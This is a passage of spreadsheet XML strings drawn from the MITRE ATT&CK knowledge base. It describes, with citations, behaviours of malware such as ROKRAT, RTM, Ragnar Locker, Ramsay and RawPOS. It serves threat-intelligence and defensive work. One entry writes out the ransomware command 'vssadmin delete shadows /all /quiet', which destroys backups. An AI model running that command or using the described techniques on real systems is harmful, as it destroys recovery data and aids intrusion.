    <t>[REvil](https://attack.mitre.org/software/S0496) can use the Windows command line to delete volume shadow copies and disable recovery.(Citation: Cylance Sodinokibi July 2019)(Citation: Talos Sodinokibi April 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) can use WMI to monitor for and kill specific processes listed in its configuration file.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) encrypts files with XOR before sending them back to the C2 server.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) decodes Base64 strings and decrypts strings using a custom XOR algorithm.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uploads and downloads files to and from the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) executes the &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uses HTTP for C2 communications.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) uses cmd.exe to execute commands on the victim’s machine.(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used the [RIPTIDE](https://attack.mitre.org/software/S0003) RAT, which communicates over HTTP with a payload encrypted with RC4.(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) has used [RIPTIDE](https://attack.mitre.org/software/S0003), a RAT that uses HTTP to communicate.(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>[ROCKBOOT](https://attack.mitre.org/software/S0112) is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence.(Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has a audio capture and eavesdropping module.(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for C2 communications.(Citation: Talos ROKRAT)(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) steals credentials stored in Web browsers by querying the sqlite database.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can request to upload collected host data and additional files.(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) sends collected files back over same C2 channel.(Citation: Talos ROKRAT)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) can request to delete files.(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) has the ability to gather a list of files and directories on the infected system.(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) retrieves additional malicious payloads from the C2 server.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) uses a keylogger to capture keystrokes and location of where the user is typing.(Citation: Talos ROKRAT)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) lists the current running processes on the system.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) accesses the &lt;code&gt;HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData&lt;/code&gt; Registry key to obtain the System manufacturer value to identify the machine type.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) captures screenshots of the infected system using the gdi32 library.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) checks for debugging tools.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) checks for sandboxing libraries.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) gathers the computer name and checks the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) use HTTPS for all command and control communication methods.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) steals credentials by leveraging the Windows Vault mechanism.(Citation: Talos Group123)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) collects data from the clipboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) samples have been signed with a code-signing certificates.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has used an RSS feed on Livejournal to update a list of encrypted C2 server names. [RTM](https://attack.mitre.org/software/S0148) has also hidden [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.(Citation: ESET RTM Feb 2017)(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has resolved [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can delete all files created during its execution.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can check for specific files and directories associated with virtualization and malware analysis.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has the ability to remove Registry entries that it created during execution.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can download additional files.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can add a certificate to the Windows store.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has named the scheduled task it creates "Windows Update".(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has been delivered as archived Windows executable files masquerading as PDF documents.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can delete all Registry entries created during its execution.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can use the &lt;code&gt;FindNextUrlCacheEntryA&lt;/code&gt; and &lt;code&gt;FindFirstUrlCacheEntryA&lt;/code&gt; functions to search for specific strings within browser history.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) used Port 44443 for its VNC module.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. [RTM](https://attack.mitre.org/software/S0148) has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain a list of smart card readers attached to the victim.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain information about process integrity levels.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) tries to add a Registry Run key under the name "Windows Update" to establish persistence.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has the capability to download a VNC module from command and control (C2).(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) runs its core DLL file using rundll32.exe.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) tries to add a scheduled task to establish persistence.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can capture screenshots.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain information about security software on the victim.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can scan victim drives to look for specific banking software on the machine to determine next actions.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has been delivered via spearphishing attachments disguised as PDF documents.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) encrypts C2 traffic with a custom RC4 variant.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the computer name, OS version, and default language identifier.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the victim username and permissions.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can obtain the victim time zone.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) can detect if it is running within a sandbox or other virtualized analysis environment.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) has initiated connections to external domains using HTTPS.(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) uses the command line and rundll32.exe to execute.(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to terminate/stop processes and services associated with endpoint security products.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) can delete volume shadow copies using &lt;code&gt;vssadmin delete shadows /all /quiet&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has been delivered as an unsigned MSI package that was executed with &lt;code&gt;msiexec.exe&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) may attempt to connect to removable drives and mapped network drives.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used regsvr32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables [Ragnar Locker](https://attack.mitre.org/software/S0481) to encrypt files on the host operating system, including files on any mapped drives.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used rundll32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to execute a service that it creates.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>Before executing malicious code, [Ragnar Locker](https://attack.mitre.org/software/S0481) checks the Windows API &lt;code&gt;GetLocaleInfoW&lt;/code&gt; and doesn't encrypt files if it finds a former Soviet country.(Citation: FBI Ragnar Locker 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used cmd.exe and batch scripts to execute commands.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to create a new service for the VirtualBox driver.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) decrypted its [Cobalt Strike](https://attack.mitre.org/software/S0154) payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) was installed under names that resembled legitimate Windows file and directory names.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) encrypted its payload using a simple XOR algorithm with a single-byte key.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) used a custom packer for its [Cobalt Strike](https://attack.mitre.org/software/S0154) payload, which was compressed using the LZMA algorithm.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) used steganography to locate the start of its encoded payload within legitimate 7-Zip code.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>After initial installation, [Raindrop](https://attack.mitre.org/software/S0565) runs a computation to delay execution.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can insert itself into the address space of other applications using the AppInit DLL Registry key.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can compress and archive collected files using WinRAR.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use [UACMe](https://attack.mitre.org/software/S0116) for privilege escalation.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use the Windows COM API to schedule tasks and maintain persistence.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can collect Microsoft Word documents from the target's file system, as well as &lt;code&gt;.txt&lt;/code&gt;, &lt;code&gt;.doc&lt;/code&gt;, and &lt;code&gt;.xls&lt;/code&gt; files from the Internet Explorer cache.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can collect data from network drives and stage it for exfiltration.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can collect data from removable media and stage it for exfiltration.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can extract its agent from the body of a malicious document.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been delivered using OLE objects in malicious documents.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;ImprovedReflectiveDLLInjection&lt;/code&gt; to deploy components.(Citation: Eset Ramsay May 2020) </t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can collect directory and file lists.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can stage data prior to exfiltration in &lt;code&gt;%APPDATA%\Microsoft\UserSetting&lt;/code&gt; and &lt;code&gt;%APPDATA%\Microsoft\UserSetting\MediaCache&lt;/code&gt;.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been executed through malicious e-mail attachments.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a JPG image file.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a 7zip installer.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use Windows API functions such as &lt;code&gt;WriteFile&lt;/code&gt;, &lt;code&gt;CloseHandle&lt;/code&gt;, and &lt;code&gt;GetCurrentHwProfile&lt;/code&gt; during its collection and file storage operations. [Ramsay](https://attack.mitre.org/software/S0458) can execute its embedded components via &lt;code&gt;CreateProcessA&lt;/code&gt; and &lt;code&gt;ShellExecute&lt;/code&gt;.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can scan for systems that are vulnerable to the EternalBlue exploit.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can scan for network drives which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has base64-encoded its portable executable and hidden itself under a JPG header. [Ramsay](https://attack.mitre.org/software/S0458) can also embed information within document footers.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can scan for removable media which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can gather a list of running processes by using [Tasklist](https://attack.mitre.org/software/S0057).(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has created Registry Run keys to establish persistence.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on removable drives.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has included a rootkit to evade defenses.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can schedule tasks via the Windows COM API to maintain persistence.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can take screenshots every 30 seconds as well as when an external removable storage device is connected.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has been distributed through spearphishing emails with malicious attachments.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has used base64 to encode its C2 traffic.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has PE data embedded within JPEG files contained within Word documents.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use [ipconfig](https://attack.mitre.org/software/S0100) and [Arp](https://attack.mitre.org/software/S0099) to collect network configuration information, including routing information and ARP tables.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can use &lt;code&gt;netstat&lt;/code&gt; to enumerate network connections.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on networks shared drives.(Citation: Eset Ramsay May 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has included embedded Visual Basic scripts in malicious documents.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) has used HTTP for C2.(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to help overwrite components of disk structure like the MBR and disk partitions.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) encodes credit card data it collected from the victim with XOR.(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)(Citation: Visa RawPOS March 2015)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>Data captured by [RawPOS](https://attack.mitre.org/software/S0169) is placed in a temporary file under a directory named "memdump".(Citation: Kroll RawPOS Jan 2017)</t>
  </si>
  <si>
    <t>New services created by [RawPOS](https://attack.mitre.org/software/S0169) are made to appear like legitimate Windows services, with names such as "Windows Management Help Service", "Microsoft Support", and "Windows Advanced Task Manager".(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) installs itself as a service to maintain persistence.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) encrypts collected data with an incremental XOR key prior to exfiltration.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) drops and executes a malicious CPL file as its payload.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) deletes the original dropped file from the victim.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>Some [Reaver](https://attack.mitre.org/software/S0172) variants use raw TCP for C2.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) encrypts some of its files with XOR.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) queries the Registry to determine the correct Startup path to use for persistence.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) creates a shortcut file and saves it in a Startup folder to establish persistence.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects the victim's IP address.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) collects the victim's username.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>Some [Reaver](https://attack.mitre.org/software/S0172) variants use HTTP for C2.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) installs itself as a new service.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can gather browser usernames and passwords.(Citation: Accenture Hogfish April 2018)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is launched through use of DLL search order hijacking to load a malicious dll.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can delete specified files.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can enumerate and search for files and directories.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is capable of downloading a file from a specified URL.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) can use HTTP over non-standard ports, such as 995, for C2.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>A [RedLeaves](https://attack.mitre.org/software/S0153) configuration file is encrypted with a simple XOR key, 0x53.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
